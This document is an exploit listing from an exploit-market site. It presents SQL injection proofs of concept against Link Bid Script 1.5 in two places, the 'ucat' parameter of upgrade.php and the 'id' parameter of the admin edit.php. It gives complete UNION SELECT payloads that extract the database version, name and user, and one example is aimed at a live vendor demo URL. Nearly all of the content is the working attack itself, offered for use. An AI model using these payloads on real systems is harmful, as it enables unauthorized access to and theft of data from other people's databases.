[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Link Bid Script 1.5 Multiple Remote SQL Injection Vulnerabilities

Author
SirGod
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3675
Category
web applications
Date add
14-09-2008
Platform
unsorted
=================================================================
Link Bid Script 1.5 Multiple Remote SQL Injection Vulnerabilities
=================================================================



#################################################################################################################
[+] Link Bid Script 1.5 Multiple Remote SQL Injection
[+] Discovered By SirGod
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen
#################################################################################################################

[+] Remote SQL Injection


  - Note : For PoC 2 you need administrative rights.

     PoC 1 :

       http://[target]/[path]/upgrade.php?ucat=[SQL]

     Example 1 :

       http://127.0.0.1/linkbid/upgrade.php?ucat=-1086 union all
select 1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

     Live Demo 1 :

       http://demo.linkbidscript.com/upgrade.php?ucat=-1086 union all
select 1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--


-----------------------------------------------------------------------------------------------------------------

     PoC 2 :

       http://[target]/[path]/linkadmin/edit.php?id=[SQL]

     Example 2 :

       http://127.0.0.1/linkbid/linkadmin/edit.php?id=-1 union all
select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

#################################################################################################################




#  0day.today [2024-12-26]  #